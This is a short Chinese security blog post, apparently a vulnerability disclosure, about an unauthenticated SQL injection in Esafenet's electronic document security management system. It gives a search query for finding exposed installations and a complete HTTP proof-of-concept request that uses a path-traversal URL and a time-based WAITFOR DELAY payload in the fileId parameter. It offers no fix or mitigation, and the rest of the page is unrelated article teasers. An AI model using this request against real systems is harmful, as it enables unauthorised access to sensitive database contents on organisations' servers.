SQL注入漏洞

guozi • 2024年6月5日下午3:19 • 行业资讯

漏洞信息

由于亿赛通电子文档安全管理系统SaveCDGPermissionFromGFOA处fileID对传入的数据没有预编译和充足的校验，导致该接口存在SQL注入漏洞，未授权的攻击者可获取数据库敏感信息。

漏洞信息

漏洞复现

复现信息

语法：

app='亿赛通-电子文档安全管理系统'

测绘搜索

POC：

POST /CDGServer3/js/../SaveCDGPermissionFromGFOA HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 39Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencoded
fileId=1';WAITFOR DELAY '0:0:2'--&pis=1

漏洞复现

复现信息

复现-1

复现-2

更多内容

发现更多

原创文章，作者：guozi，如若转载，请注明出处：https://www.sudun.com/ask/90243.html

Like (0)

0 0

要避免的 9 个 SQL 错误

Previous 2024年6月5日

SqlSugar，就这个Feel 倍儿爽！

Next 2024年6月5日

如何利用网站流量查看工具提高网站的访问量？

你是否曾经苦恼于网站的访问量低迷？想要提高网站的流量却不知道从何下手？别担心，今天我们就来为你解决这个问题。如何利用网站流量查看工具提高网站的访问量？这个问题或许曾经困扰过你，但是…

牛晓晓
行业资讯 2024年3月19日
00
win10电脑自动关机命令（详解）

win10电脑自动关机命令，或许是你在使用电脑时最常遇到的一个问题。当你正专心处理重要的工作时，突然电脑自动关机，让你不得不中断工作进程。那么什么是win10电脑自动关机命令？它又…

牛晓晓
行业资讯 2024年4月5日
00
ip6s

网络安全加速行业，这个看似陌生的名词，却是当今互联网时代中不可或缺的一部分。它究竟是什么？它又有什么作用？或许你还不太了解，但是它却已经悄然影响着我们的日常生活。今天，让我们一起来…

牛晓晓
行业资讯 2024年3月29日
00
如何查看网站的被访问量，如何知道网站流量

网站流量监控是每个网站站长都需要关注的问题。随着互联网的发展，越来越多的网站受到攻击，如何检测并及时解决这些攻击已成为一个紧迫的问题。本文介绍了网站流量监控的重要性和作用，并解释了…

牛晓晓
行业资讯 2024年5月9日
00

发表回复